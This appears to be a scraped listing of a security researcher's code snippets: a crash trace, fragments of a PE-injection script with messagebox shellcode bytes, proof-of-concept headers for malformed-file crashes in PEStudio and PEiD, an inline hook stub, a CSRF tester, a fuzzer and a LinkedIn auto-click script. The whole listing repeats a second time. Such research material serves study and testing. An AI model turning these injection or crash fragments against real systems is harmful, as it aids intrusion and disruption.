Debasish Mandal debasishm89

## MS12-027 Crash Analysis
Crash Stack Trace:

0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d


## peinject.py
from pefile import PE
from struct import pack
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=Debasish Was Here!
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +

## pestudio.py
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.

'''

## Messagbox.asm
; Sample shellcode that will pop a MessageBox
; with custom title and text
; Written by Peter Van Eeckhoutte
; http://www.corelan.be:8800


[Section .text]
[BITS 32]

global _start

## peid-poc.py
#POC
#c:\python27
junk = "\x41"
header = "MZ"
header += junk * 58
header += "\x80"
header += "\x00" * 3
header += junk * 64
header += "PE"
header += "\x00"*2

## inlinehookdll.c
#include <windows.h>
__declspec(naked) EvilFunction()
{
          /*
          0007FA18   01001FC4  Ä.  /CALL to MessageBoxW from notepad.01001FBE
          0007FA1C   001503C8  È.  |hOwner = 001503C8 ('Find',class='#32770',parent=003C029E)
          0007FA20   000A3A88  ˆ:..  |Text = "Cannot find "junk""
          0007FA24   000A8F34  4..  |Title = "Notepad"
          0007FA28   00000040  @...  \Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
          */

## fbxsrf.py
from rawweb import *
def main(raw_stream,ssl):
	'''
	This Burpy module is specially written to find CSRF vulnerability in Facebook Application.
	It has already found few minor CSRF vulnerability in FB application. Few them was qualifed for Bug Bounty.
	It simply checks whether CSRF token validation is present in Server Side or not by removing token
from request and replaying it.Facebook application always throws a generic error message for CSRF error which is
"Please try closing and re-opening your browser". If this error is not present in response after removing the token
it returns +ve.
	'''

## execution_tracer.py
import re
import sys
import pefile
from pydbg import *
from pydbg.defines import *

def parseidalog(file):
	all_funcs = []
	f = open(file)
	funcs = f.readlines()

## linkedIn.js
var tok = window.setInterval(function() {
	var total_req = 100;//change it to 200,300 etc..to send request to 200,300 people at a time. May slowdown network
	var all = document.getElementsByClassName('vcard-button bt-connect bt-primary')
	if (all.length < total_req)
		document.body.scrollTop = document.body.scrollHeight;
	else{
		clearInterval(tok);window.scrollTo(0,0);
		for(var i = 0 ; i <= all.length; i++){
			all[i].click();}
}}, 2000);

## inmemory-ioctl-fuzzer-logger.py
'''

Author : Debasish Mandal
Blog :http://www.debasish.in/
Twitter : https://twitter.com/debasishm89

A mutation based user mode (ring3) dumb in-memory IOCTL Fuzzer/Logger.
This script attach it self to any given process and hooks DeviceIoControl!Kernel32 API and
try to log or fuzz all I/O Control code I/O Buffer pointer, I/O buffer length that
process sends to any Kernel driver.
	Crash Stack Trace:

	0:000> kb
	ChildEBP RetAddr Args to Child
	WARNING: Stack unwind information not available. Following frames may be wrong.
	0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
	0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
	00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d
	from pefile import PE
	from struct import pack
	# windows/messagebox - 265 bytes
	# http://www.metasploit.com
	# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
	# TEXT=Debasish Was Here!
	sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
	"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
	"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
	"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
	# Title: PEStudio Version 3.69 Denial of Service
	# Date: 5th June 2013
	# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
	# Blog : http://www.debasish.in/
	# Software Homepage: http://www.winitor.com/
	# Version: PEStudio Version 3.69
	# Tested on: Windows XP SP2 / Windows 7
	# Vendor Patch : Recently released stable version (v6.91) is not affected.

	'''
	; Sample shellcode that will pop a MessageBox
	; with custom title and text
	; Written by Peter Van Eeckhoutte
	; http://www.corelan.be:8800


	[Section .text]
	[BITS 32]

	global _start
	#POC
	#c:\python27
	junk = "\x41"
	header = "MZ"
	header += junk * 58
	header += "\x80"
	header += "\x00" * 3
	header += junk * 64
	header += "PE"
	header += "\x00"*2
	#include <windows.h>
	__declspec(naked) EvilFunction()
	{
	/*
	0007FA18 01001FC4 Ä. /CALL to MessageBoxW from notepad.01001FBE
	0007FA1C 001503C8 È. \|hOwner = 001503C8 ('Find',class='#32770',parent=003C029E)
	0007FA20 000A3A88 ˆ:.. \|Text = "Cannot find "junk""
	0007FA24 000A8F34 4.. \|Title = "Notepad"
	0007FA28 00000040 @... \Style = MB_OK\|MB_ICONASTERISK\|MB_APPLMODAL
	*/
	from rawweb import *
	def main(raw_stream,ssl):
	'''
	This Burpy module is specially written to find CSRF vulnerability in Facebook Application.
	It has already found few minor CSRF vulnerability in FB application. Few them was qualifed for Bug Bounty.
	It simply checks whether CSRF token validation is present in Server Side or not by removing token
	from request and replaying it.Facebook application always throws a generic error message for CSRF error which is
	"Please try closing and re-opening your browser". If this error is not present in response after removing the token
	it returns +ve.
	'''
	import re
	import sys
	import pefile
	from pydbg import *
	from pydbg.defines import *

	def parseidalog(file):
	all_funcs = []
	f = open(file)
	funcs = f.readlines()
	var tok = window.setInterval(function() {
	var total_req = 100;//change it to 200,300 etc..to send request to 200,300 people at a time. May slowdown network
	var all = document.getElementsByClassName('vcard-button bt-connect bt-primary')
	if (all.length < total_req)
	document.body.scrollTop = document.body.scrollHeight;
	else{
	clearInterval(tok);window.scrollTo(0,0);
	for(var i = 0 ; i <= all.length; i++){
	all[i].click();}
	}}, 2000);
	'''

	Author : Debasish Mandal
	Blog :http://www.debasish.in/
	Twitter : https://twitter.com/debasishm89

	A mutation based user mode (ring3) dumb in-memory IOCTL Fuzzer/Logger.
	This script attach it self to any given process and hooks DeviceIoControl!Kernel32 API and
	try to log or fuzz all I/O Control code I/O Buffer pointer, I/O buffer length that
	process sends to any Kernel driver.